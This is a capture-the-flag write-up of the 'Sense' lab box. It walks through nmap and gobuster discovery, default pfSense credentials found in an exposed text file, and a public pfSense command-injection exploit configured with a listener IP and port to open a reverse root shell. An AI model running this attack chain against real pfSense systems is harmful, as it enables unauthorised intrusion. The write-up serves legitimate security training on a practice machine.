Summary

Sense is an easy Linux box that can be exploited by performing a directory brute-force to identify the login page of pfSense. The brute-force also helps to identify a file that contains credentials for pfSense. This combination was used to exploit pfSense with a public exploit to obtain a root shell.


Discovery

Nmap discovered the following open ports and services:

nmap -sC -sV -oN fullscan -Pn 10.129.94.74

PORT    STATE SERVICE
80/tcp  open  http
443/tcp open  https

Gobuster found the following locations:

https://10.129.94.74:443/system.php	
https://10.129.94.74:443/changelog.txt (Status: 200)
https://10.129.94.74:443/system-users.txt (Status: 200)
https://10.129.94.74:443/xmlrpc.php (Status: 200) [Size: 384]

The page: https://10.129.94.74/changelog.txt, showed the following message:

# Security Changelog 

### Issue
There was a failure in updating the firewall. Manual patching is therefore required

### Mitigated
2 of 3 vulnerabilities have been patched.

### Timeline
The remaining patches will be installed during the next maintenance window

This strongly suggests a vulnerability is present. The following page: https://10.129.94.74/system-users.txt, showed an active user:

####Support ticket###

Please create the following user


username: Rohit
password: company defaults

After a couple tries, it was found that the default combination is:
rohit:pfsense
The user is now authenticated to the pfSense dashboard:


Exploitation

Searchsploit was used to identify vulnerabilities within pfSense since the changelog.txt suggested there is a unpatched vulnerability.

jeroen@kali:~$ searchsploit pfsense injection
---------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                |  Path
---------------------------------------------------------------------------------------------- ---------------------------------
Pfsense 2.3.4 / 2.4.4-p3 - Remote Code Injection                                              | php/webapps/47413.py
pfSense < 2.1.4 - 'status_rrd_graph_img.php' Command Injection                                | php/webapps/43560.py
---------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

The following exploit was used to exploit this vulnerability: https://github.com/spencerdodd/pfsense-code-exec/blob/master/pfsense_exec.py The script was modified as follows:

username = 		"rohit"
password = 		"pfsense"
listener_ip = 	"10.10.14.24"
listener_port = "4444"
target_ip = "10.129.94.74"
url = "https://{}/".format(target_ip)
proxied_url = "https://127.0.0.1:31337/"

A netcat listener was setup and the script was run with:
python pfsense_exec.py nc
This provided a root shell. From here the root.txt and user.txt can be retrieved.


Conclusion

This was a very easy box that could be exploited by properly brute-forcing for files and directories. The exploitation of pfSense was straightforward so it didn’t take too long to root this box. Hope you had the same and enjoyed this writeup!